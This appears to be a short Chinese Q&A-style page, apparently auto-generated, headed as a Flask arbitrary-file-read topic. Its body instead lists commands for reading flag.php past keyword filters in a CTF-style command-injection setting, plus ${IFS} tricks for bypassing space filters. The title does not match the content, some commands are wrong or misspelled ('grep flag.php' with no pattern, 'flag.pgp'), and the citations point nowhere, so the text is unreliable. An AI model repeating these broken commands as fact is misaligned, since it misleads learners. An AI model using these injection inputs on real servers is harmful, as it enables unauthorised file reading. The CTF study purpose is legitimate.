flask任意文件读取漏洞
时间: 2023-10-19 19:31:38 浏览: 188
根据引用中提供的命令,可以使用以下方式绕过flag过滤:
- 使用cat命令:cat flag.php
- 使用tac命令:tac flag.php
- 使用more命令:more flag.php
- 使用less命令:less flag.php
- 使用head命令:head flag.php
- 使用nl命令:nl flag.php
- 使用od命令:od -c flag.php
- 使用vi命令:vi flag.php
- 使用vim命令:vim flag.php
- 使用sort命令:sort flag.php
- 使用uniq命令:uniq flag.php
- 使用file命令:file -f flag.pgp
- 使用grep命令:grep flag.php
- 使用paste命令:paste flag.php
- 使用xxd命令:xxd flag.php
另外,根据引用中提供的信息,还可以尝试绕过空格过滤:
- 使用${IFS}$替换空格,例如:cat${IFS}flag.php
- 使用$IFS$1替换空格,例如:cat$IFS$1flag.php
需要注意的是,绕过flag过滤可能会受到其他过滤规则的限制,如引用中提到的关键词和符号过滤。因此,在实际应用中需要综合考虑不同的情况。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
阅读全文